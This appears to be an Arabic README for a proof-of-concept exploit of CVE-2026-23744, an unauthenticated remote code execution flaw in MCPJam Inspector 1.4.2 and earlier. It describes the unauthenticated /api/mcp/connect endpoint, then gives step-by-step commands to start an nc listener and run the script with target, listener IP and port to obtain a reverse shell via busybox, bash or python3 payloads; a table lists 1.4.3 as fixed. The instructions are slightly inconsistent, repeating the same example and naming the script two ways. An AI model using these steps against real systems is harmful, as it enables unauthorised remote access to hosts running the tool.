
CVE-2026-23744 — استغلال لإثبات المفهوم لثغرة تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليها في MCPJam Inspector <= 1.4.2.
MCPJam Inspector <= 1.4.2 يرتبط بـ 0.0.0.0 افتراضيًا ويكشف عن /api/mcp/connect بدون أي مصادقة. تقبل نقطة النهاية كائن serverConfig يقوم بتشغيل عملية مباشرة على المضيف — وتمرير حمولة صدفة عكسية يمنح RCE فوريًا دون الحاجة إلى أي بيانات اعتماد.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| المفتاح | الوصف | الافتراضي |
|---|---|---|
-u | رابط الهدف | مطلوب |
-i | عنوان IP للمستمع الخاص بك (LHOST) | مطلوب |
-p | منفذ المستمع الخاص بك (LPORT) | مطلوب |
-m | طريقة الحمولة: busybox, bash, python3 | busybox |
الخطوة 1 — شغّل المستمع الخاص بك:
nc -lvnp 4444
الخطوة 2 — نفّذ الاستغلال:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
إذا لم يعمل busybox على الهدف، جرّب الطرق الأخرى:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| البرنامج | المتأثر | المُصلَح |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |